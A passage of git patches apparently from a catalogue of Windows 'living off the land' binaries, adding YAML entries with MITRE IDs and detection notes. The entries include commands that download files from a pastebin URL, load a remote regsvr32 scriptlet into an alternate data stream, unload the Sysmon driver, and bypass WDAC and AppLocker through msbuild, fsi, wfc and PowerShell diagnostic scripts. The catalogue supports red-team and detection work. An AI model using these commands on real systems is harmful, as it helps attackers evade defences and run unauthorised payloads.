+0300 Subject: [PATCH 22/32] edited cdb.yml --- yml/OtherMSBinaries/Cdb.yml | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 2411a0d..a5edabc 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -12,6 +12,16 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows + - Command: | + cdb.exe -pd -pn + .shell + Description: Attaching to any process and executing shell commands + Usecase: Run a shell command under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe @@ -23,7 +33,12 @@ Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda + - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/ Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- \ No newline at end of file + - Person: mr.d0x + Handle: '@mrd0x' + - Person: Spooky Sec + Handle: '@spooky_sec' +--- From d539a7dacd33bdcb7bde8056dedcb5f86ceab4de Mon Sep 17 00:00:00 2001 From: SpookySec Date: Fri, 12 Feb 2021 22:26:16 +0300 Subject: [PATCH 23/32] edited cdb.yml --- yml/OtherMSBinaries/Cdb.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index a5edabc..32830c2 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -40,5 +40,5 @@ Acknoledgement: - Person: mr.d0x Handle: '@mrd0x' - Person: Spooky Sec - Handle: '@spooky_sec' + Handle: '@sec_spooky' --- From 782bc68c7cb77073caf2fb0817fad31461cf9597 Mon Sep 17 00:00:00 2001 From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Fri, 5 Mar 2021 11:35:06 -0500 Subject: [PATCH 24/32] Create IMEWDBLD.yml --- yml/OSBinaries/IMEWDBLD.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 yml/OSBinaries/IMEWDBLD.yml diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml new file mode 100644 index 0000000..e1167c1 --- /dev/null +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -0,0 +1,22 @@ +--- +Name: IMEWDBLD.exe +Description: Microsoft IME Open Extended Dictionary Module +Author: 'Wade Hickey' +Created: '2020-03-05' +Commands: + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1367493406835040265 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- From bbf14cf4b9ed7d9e2c680632590551bb9972095c Mon Sep 17 00:00:00 2001 From: Parker McGee <232132+pgmcgee@users.noreply.github.com> Date: Sat, 20 Mar 2021 16:40:37 -0400 Subject: [PATCH 25/32] Fix a typo in Findstr.yml `finstr.exe` should be `findstr.exe` --- yml/OSBinaries/Findstr.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 95668b9..35f823c 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -42,11 +42,11 @@ Full_Path: Code_Sample: - Code: Detection: - - IOC: finstr.exe should normally not be invoked on a client system + - IOC: findstr.exe should normally not be invoked on a client system Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- From ebf494ae4debab34e6f1d92d6613792ba79fbcb5 Mon Sep 17 00:00:00 2001 From: Efraim-Kaplan <54638674+Efraim-Kaplan@users.noreply.github.com> Date: Fri, 2 Jul 2021 17:33:53 -0400 Subject: [PATCH 26/32] FIxed typo Replaced "handeling" with "handling". --- yml/OSBinaries/Certutil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index d66a264..414e531 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,6 +1,6 @@ --- Name: Certutil.exe -Description: Windows binary used for handeling certificates +Description: Windows binary used for handling certificates Author: 'Oddvar Moe' Created: '2018-05-25' Commands: From 87c3319ad4797c1160b259f82fcb0330fa312816 Mon Sep 17 00:00:00 2001 From: Josh Brower Date: Tue, 6 Jul 2021 13:56:24 -0400 Subject: [PATCH 27/32] Fix ART link --- yml/OSBinaries/Cmd.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 1fc9f9f..a951c7a 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' Created: '2019-06-26' Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat + - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS From ecbc2f817f20c8687cdd0c3a60a584004958f751 Mon Sep 17 00:00:00 2001 From: John Lambert Date: Sat, 18 Sep 2021 17:43:59 -0700 Subject: [PATCH 28/32] Add lolbin for fltMC.exe Used by redteams for defense evasion to disable drivers used by agents like sysmon https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon https://github.com/oddcod3/Phantom-Evasion/blob/master/Modules/post-exploitation/Postex_CMD_UnloadSysmonDriver_windows.py --- yml/OSBinaries/fltMC.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OSBinaries/fltMC.yml diff --git a/yml/OSBinaries/fltMC.yml b/yml/OSBinaries/fltMC.yml new file mode 100644 index 0000000..c22696a --- /dev/null +++ b/yml/OSBinaries/fltMC.yml @@ -0,0 +1,26 @@ +--- +Name: fltMC.exe +Description: Filter Manager Control Program used by Windows +Author: 'John Lambert' +Created: '2021-09-18' +Commands: + - Command: fltMC.exe unload SysmonDrv + Description: Unloads a driver used by security agents + Usecase: Defense evasion + Category: ADS + Privileges: Admin + MitreID: T1562 + MitreLink: https://attack.mitre.org/techniques/T1562/002/ + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\fltMC.exe +Code_Sample: +- Code: +Detection: + - IOC: 4688 events with fltMC.exe +Resources: + - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon +Acknowledgement: + - Person: Carlos Perez + Handle: '@Carlos_Perez' +--- From 559d9bc3ff0969f450ec2adb8423f63a25b8e7fe Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:28:01 +0800 Subject: [PATCH 29/32] Create VSIISExeLauncher.yml --- yml/OtherMSBinaries/VSIISExeLauncher.yml | 26 ++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OtherMSBinaries/VSIISExeLauncher.yml diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml new file mode 100644 index 0000000..5c92f3d --- /dev/null +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -0,0 +1,26 @@ +--- +Name: VSIISExeLauncher.exe +Description: Binary will execute specified binary. Part of VS/VScode installation. +Author: 'timwhite' +Created: '2021-09-24' +Commands: + - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" + Description: The above binary will execute other binary. + Usecase: Execute any binary with given arguments. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 and up with VS/VScode installed +Full_Path: + - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' +Code_Sample: + - Code: +Detection: + - IOC: VSIISExeLauncher.exe spawned an unknown process +Resources: + - Link: +Acknowledgement: + - Person: timwhite + Handle: +--- From 9336b4d599c241d86720a6e9b833f9dc173d4cd4 Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:28:39 +0800 Subject: [PATCH 30/32] Update VSIISExeLauncher.yml --- yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 5c92f3d..33d36a5 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -19,7 +19,7 @@ Code_Sample: Detection: - IOC: VSIISExeLauncher.exe spawned an unknown process Resources: - - Link: + - Link: https://github.com/timwhitez Acknowledgement: - Person: timwhite Handle: From b5357cdec00bbfe4e714fa227da2230a27d70918 Mon Sep 17 00:00:00 2001 From: root Date: Sun, 26 Sep 2021 23:31:30 -0400 Subject: [PATCH 31/32] Adding app-ctrl bypass bins and a few lolscripts --- yml/OSBinaries/Aspnet_Compiler.yml | 28 ++++++++++++++ yml/OSBinaries/Msbuild.yml | 12 ++++++ yml/OSScripts/CL_LoadAssembly.yml | 30 +++++++++++++++ yml/OSScripts/UtilityFunctions.yml | 26 +++++++++++++ yml/OtherMSBinaries/Fsi.yml | 38 +++++++++++++++++++ yml/OtherMSBinaries/FsiAnyCpu.yml | 36 ++++++++++++++++++ yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 31 +++++++++++++++ yml/OtherMSBinaries/Wfc.yml | 28 ++++++++++++++ 8 files changed, 229 insertions(+) create mode 100644 yml/OSBinaries/Aspnet_Compiler.yml create mode 100644 yml/OSScripts/CL_LoadAssembly.yml create mode 100644 yml/OSScripts/UtilityFunctions.yml create mode 100644 yml/OtherMSBinaries/Fsi.yml create mode 100644 yml/OtherMSBinaries/FsiAnyCpu.yml create mode 100644 yml/OtherMSBinaries/VisualUiaVerifyNative.yml create mode 100644 yml/OtherMSBinaries/Wfc.yml diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml new file mode 100644 index 0000000..7cbd821 --- /dev/null +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -0,0 +1,28 @@ +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index b5bfbe5..5b4deca 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -20,6 +20,14 @@ Commands: MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msbuild.exe project.proj + Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. + Usecase: Execute project file that contains XslTransformation tag parameters + Category: Execute + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe @@ -27,6 +35,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe + - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe Code_Sample: - Code: Detection: @@ -36,9 +45,12 @@ Resources: - Link: https://github.com/Cn33liz/MSBuildShell - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Cn33liz Handle: '@Cneelis' + - Person: Jimmy + Handle: '@bohops' --- \ No newline at end of file diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml new file mode 100644 index 0000000..4bc7719 --- /dev/null +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -0,0 +1,30 @@ +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- + + + +powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; RegSnapin ..\..\..\..\testing\fun.dll;[Program.Class]::Fun() \ No newline at end of file diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml new file mode 100644 index 0000000..8f92417 --- /dev/null +++ b/yml/OSScripts/UtilityFunctions.yml @@ -0,0 +1,26 @@ +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml new file mode 100644 index 0000000..66f55f7 --- /dev/null +++ b/yml/OtherMSBinaries/Fsi.yml @@ -0,0 +1,38 @@ +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml new file mode 100644 index 0000000..855f7d7 --- /dev/null +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -0,0 +1,36 @@ +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml new file mode 100644 index 0000000..dafea55 --- /dev/null +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -0,0 +1,31 @@ +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml new file mode 100644 index 0000000..8542015 --- /dev/null +++ b/yml/OtherMSBinaries/Wfc.yml @@ -0,0 +1,28 @@ +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file From 741d0f7b360028191a04a3eac4ea4215cf53f635 Mon Sep 17 00:00:00 2001 From: bohops Date: Sun, 26 Sep 2021 23:35:01 -0400 Subject: [PATCH 32/32] Update CL_LoadAssembly.yml --- yml/OSScripts/CL_LoadAssembly.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 4bc7719..81e37cd 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -24,7 +24,3 @@ Acknowledgement: - Person: Jimmy Handle: '@bohops' --- - - - -powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; RegSnapin ..\..\..\..\testing\fun.dll;[Program.Class]::Fun() \ No newline at end of file